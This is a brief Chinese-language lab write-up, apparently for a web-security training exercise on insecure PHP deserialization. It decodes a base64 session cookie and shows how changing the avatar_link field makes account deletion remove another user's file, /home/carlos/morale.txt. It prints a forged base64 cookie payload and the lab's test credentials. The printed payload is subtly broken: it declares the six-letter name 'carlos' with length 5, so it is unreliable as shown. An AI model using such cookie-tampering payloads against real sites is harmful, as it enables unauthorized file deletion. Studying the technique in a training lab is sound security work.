# Insecure deserialization Lab3 這題透過一個有副作用（side effect）的方法來刪掉 Carlos 的 morale.txt。。 帳密：`wiener:peter`、`gregg:rosebud` 一樣先進入網站並登入。  觀察網站的 Cookie 時，可以發現 session 的內容是 b64 編碼。  拿去解碼後可以得到一串格式。 ``` O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"ssux1sjavtwrihgapfwia7hystvg5bnw";s:11:"avatar_link";s:19:"users/wiener/avatar";} ``` 從解碼後的結果，我們可以有幾個資訊： - `avatar_link` 是用來指定頭像圖片檔案的屬性 - 在帳號刪除時，**系統會根據這個路徑刪除檔案** - 我們可以把它改成：`/home/carlos/morale.txt`，利用應用邏輯錯誤來刪掉別人的檔案  ``` Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImNhcmxvcyI7czoxMToiYXZhdGFyX2xpbmsiO3M6MjM6Ii9ob21lL2Nhcmxvcy9tb3JhbGUudHh0Ijt9Cg== ```   ---